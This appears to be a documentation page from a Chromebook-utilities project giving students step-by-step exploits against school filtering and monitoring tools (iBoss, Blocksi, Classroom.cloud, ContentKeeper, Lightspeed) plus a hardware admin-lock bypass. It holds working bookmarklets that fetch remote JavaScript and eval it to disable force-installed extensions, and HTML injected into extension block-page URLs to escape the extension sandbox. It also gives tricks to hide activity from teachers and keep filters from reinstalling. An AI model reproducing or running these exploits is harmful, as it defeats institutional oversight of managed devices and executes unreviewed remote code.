Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/S-PScripts/chromebook-utilities/llms.txt

Use this file to discover all available pages before exploring further.

iBoss and Blocksi are web filtering platforms deployed on school-managed Chromebooks as force-installed extensions. iBoss operates as both a Chrome extension and a companion Chrome App that communicate over localhost HTTP, making it vulnerable to the HSTS bypass in addition to dedicated exploits. Blocksi works similarly via a force-installed extension with a block page rendered at chrome-extension://ghlpmldmjjhmdgmneoaibbegkjjbonbk/pages/blockPage.html. This page also covers Classroom.cloud, ContentKeeper, and Lightspeed — other content filtering tools that share Chromebook deployment patterns.

iBoss

A recreation of the Ingot GUI exploit that takes advantage of a vulnerability found specifically in the iBoss extension to disable force-installed extensions via the chrome.management API.Requirements: iBoss extension installed.
1

Create the bookmarklet

Create a bookmark with this JavaScript URL:
javascript:(async function(){eval(await(await fetch("https://cdn.jsdelivr.net/gh/SpaceSaver/Ingot-for-iBoss@latest/ingot.js")).text())})();
2

Navigate to any non-Chrome-internal page

Go to any regular webpage (not a chrome:// page, chrome-extension:// page, or new tab).
3

Run the bookmarklet

Click the bookmark. The Ingot GUI will load and allow you to disable extensions.
Credits: SpaceSaver
Uses a crafted extension block page URL to inject an <a href="about:blank"> tag with the rel="opener" attribute, creating a popup window that can run JavaScript outside the extension’s sandbox. The uboss.js script then runs to disable the extension.For iBoss:
chrome-extension://kmffehbidlalibfeklaefnckpidbodff/restricted.html?re=1&bc=<a+href="about:blank"+rel="opener"+target="_blank">The+Blue+Hat+Crew+is+the+best!</a>
For Blocksi:
chrome-extension://ghlpmldmjjhmdgmneoaibbegkjjbonbk/pages/blockPage.html?blockurl={"hostname":"<a href='//' rel='opener' target='_blank'>TheBlueHatCrewIsTheBest</a>"}
JavaScript bookmarklet (run on the extension block page):
javascript:opener.eval(`fetch("https://raw.githubusercontent.com/3kh0/ext-remover/3e4ea6b09b83d2cae0f8ed74be0a8e7c12ad9f1f/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
1

Open the appropriate URL

Navigate to the iBoss or Blocksi block page URL listed above (matching the extension you have installed).
2

Run the bookmarklet

Create the JavaScript bookmarklet above and run it on that extension block page.
3

Follow the GUI instructions

The uBoss GUI will load. Follow the on-screen instructions to disable the extension.
Credits: 3kh0/ext-remover, Aka-but-nice, Bypassi

Classroom.cloud Disabler

The Classroom.cloud Student extension checks the device’s system clock to determine whether it is currently “school hours.” By changing the device time zone to one where school hours have not yet started (or have already ended), the extension switches to an “Out of hours” state in which teachers lose monitoring and control capabilities.
This exploit is listed as patched. See https://github.com/S-PScripts/classroom.cloud-exploit/ for more information.
1

Open Settings

Go to the Settings app on your Chromebook.
2

Navigate to Date and Time

Go to System preferencesDate and TimeTime Zone.
3

Choose a custom time zone

Change the option from Set automatically to Choose from list.
4

Select an off-hours time zone

Choose a time zone where it would currently be early in the morning or late at night (outside your school’s hours).
How it works: During school hours the extension shows as Available. When outside school hours it shows as Out of hours, during which teachers cannot view screens, lock devices, or perform other actions. Because the extension uses the device clock, changing the time zone directly changes its status.
This likely also works with the NetSupport School Student extension, as it is developed by the same company (NetSupport) and shares the same feature set.
Credits: S-PScripts

ContentKeeper Remover

Permanently removes ContentKeeper by powerwashing, blocking the app from reinstalling by disabling the Google Play Store (which ContentKeeper uses as its installation vector), then turning internet back on.
1

Sign out and powerwash

Press Ctrl+Shift+Q+Q to sign out. When the login screen appears, powerwash with Ctrl+Alt+Shift+R.
2

Sign in and disconnect Wi-Fi

Sign in to your account. As soon as you log in, disconnect from Wi-Fi. This prevents ContentKeeper from installing automatically.
3

Wait for Play Store preferences to appear

Navigate to SettingsApps → manage Google Play preferences. If the option is not there, briefly turn Wi-Fi on until it appears, then disconnect again.
4

Disable the Play Store

Go to Android settingsAppsAll apps → scroll down to Google Play Store → click it → press Disable.
5

Turn Wi-Fi back on

After the Play Store is disabled, you can turn Wi-Fi back on without ContentKeeper reinstalling.
This fix persists until the next powerwash.Credits: screwedover, Titanium Network

Lightspeed Stealth

When Lightspeed locks or blocks your Chromebook, most Chrome extensions lack permission to run on the new tab page. This exploit embeds an iframe inside the new tab page context using a bookmarklet, loading any site within that iframe where Lightspeed cannot intercept it.Requirements: Bookmarklets must be enabled (patched in later versions of ChromeOS). Default search engine must be set to Bing.
1

Set Bing as your search engine

Go to chrome://settings/search and set your default search engine to Bing.
2

Create the bookmarklet

Create a bookmark with the following URL:
javascript:document.write(`<style> iframe{margin:0px; border:none; padding:0px; outline:none} body{margin:0px}</style><iframe src = "${prompt("enter url")}" width = ${window.innerWidth} height = ${window.innerHeight} />`)
3

Open a new tab

Open a new tab in Chrome.
4

Click the bookmarklet

Click your bookmarklet. A prompt will appear asking for a URL.
5

Enter the target URL

Type the URL you want to visit and press Enter.
This only works if bookmarklets (JavaScript in bookmark URLs) are permitted by policy. It is unknown exactly what appears on the teacher’s screen, but they likely see only the new tab page rather than the actual site.
Credits: velzie/CoolElectronics, Titanium Network

Admin Lock Bypass

Removes the admin lock on a Chromebook by briefly disconnecting the battery from the motherboard. This is a hardware-level exploit.
This method involves opening your Chromebook. Doing so may void any warranty and carries a risk of physical damage if done incorrectly. Proceed with caution.
Requirements: A screwdriver appropriate for your Chromebook model.
1

Power off the Chromebook

Shut the device down completely.
2

Unscrew and open the back cover

Use a screwdriver to remove the back cover screws and lift the panel off.
3

Unplug the battery connector

Locate the power cord connecting the battery to the motherboard and unplug it.
4

Hold the power button

Hold the power button for 30 seconds to discharge any remaining capacitor charge.
5

Reconnect and reassemble

Plug the battery connector back in and replace the back cover.
Credits: JackWagon885 — https://the-wagonization.github.io/The-Wagon-Site/

Build docs developers (and LLMs) love

Get started for freeTalk to us